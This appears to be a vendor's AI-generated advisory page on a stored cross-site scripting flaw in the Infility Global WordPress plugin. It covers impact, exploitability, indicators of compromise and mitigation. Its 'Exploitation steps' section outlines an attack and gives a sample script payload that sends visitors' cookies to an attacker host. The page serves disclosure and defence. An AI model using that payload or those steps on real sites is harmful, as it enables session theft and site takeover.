CVE-2025-68864
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-68864 is a Stored Cross-Site Scripting (XSS) vulnerability in the Infility Global WordPress plugin, classified under CWE-79. It affects all versions of the Infility Global plugin up to and including 2.15.22 (with the affected version boundary updated multiple times by Patchstack, most recently reflecting ≤ 2.15.22). The vulnerability was reported on October 14, 2025, by researcher mcdruid and published by Patchstack on January 15–22, 2026. It carries a CVSS v3.1 base score of 7.1 (High), assigned by Patchstack (Patchstack, NVD).

Technical details

The vulnerability is rooted in improper neutralization of user-supplied input during web page generation (CWE-79), allowing an attacker to inject and persistently store malicious scripts within the plugin's output. As a Stored XSS, the payload is saved server-side and executed in the browsers of users who subsequently visit the affected page, without requiring the attacker to have any authenticated privilege (unauthenticated exploitation is possible). Successful exploitation requires user interaction — a privileged user must visit or interact with the page containing the injected payload. No detailed technical write-up or public PoC code has been identified beyond the Patchstack advisory (Patchstack, NVD).

Impact

Successful exploitation allows an attacker to inject persistent malicious JavaScript into WordPress pages served by the Infility Global plugin, which executes in the context of any user's browser visiting the affected content. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of authenticated users (including administrators), defacement, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, potentially affecting the broader WordPress site and its visitors (Patchstack).

Exploitability

No public exploit code or active in-the-wild exploitation has been confirmed for CVE-2025-68864. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of site popularity, and has issued a virtual patch/mitigation rule for its subscribers (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Infility Global plugin (versions ≤ 2.15.22) using tools like WPScan, Shodan, or by inspecting plugin directories on target sites.
  2. Identify injection point: Locate the input field(s) within the Infility Global plugin that are vulnerable to stored XSS — typically a form, widget, or settings field that accepts and renders user-supplied content without proper sanitization.
  3. Craft malicious payload: Prepare a JavaScript payload designed to steal session cookies, redirect users, or perform actions on behalf of authenticated visitors, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Submit payload: As an unauthenticated or low-privileged user, submit the crafted payload through the vulnerable input field. The payload is stored server-side by the plugin.
  5. Trigger execution: Wait for a privileged user (e.g., an administrator) to visit the page or section where the payload is rendered. The browser executes the injected script in the victim's session.
  6. Achieve objective: Harvest session tokens, perform administrative actions, or further compromise the WordPress site (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unexpected POST requests to Infility Global plugin endpoints containing HTML/JavaScript tags or encoded script payloads (e.g., %3Cscript%3E, <script>, onerror=, onload=).
  • File System: Unexpected modifications to plugin files or database entries (wp_options, wp_posts, or plugin-specific tables) containing embedded <script> tags or JavaScript event handlers.
  • Network: Outbound connections from site visitors' browsers to unknown external domains shortly after visiting pages rendered by the Infility Global plugin; unusual referrer traffic to attacker-controlled infrastructure.
  • Browser/Application: Users reporting unexpected redirects, pop-ups, or unauthorized actions (e.g., password changes, new admin accounts) after visiting affected pages.

Mitigation and workarounds

As of the latest available information, no official patch from the plugin developer has been released — the Patchstack advisory notes "No official patch available" for versions ≤ 2.15.22. Site administrators should consider deactivating and removing the Infility Global plugin until a patched version is available. Patchstack subscribers benefit from a virtual patch/mitigation rule that blocks exploitation attempts. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules and monitoring plugin input fields for script injection are recommended interim measures (Patchstack).

Community reactions

Wordfence referenced this vulnerability in their weekly WordPress vulnerability report for the week of January 12–18, 2026, indicating it was tracked by the broader WordPress security community. No significant vendor statements, researcher commentary beyond the Patchstack disclosure, or notable media coverage have been identified for this CVE.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management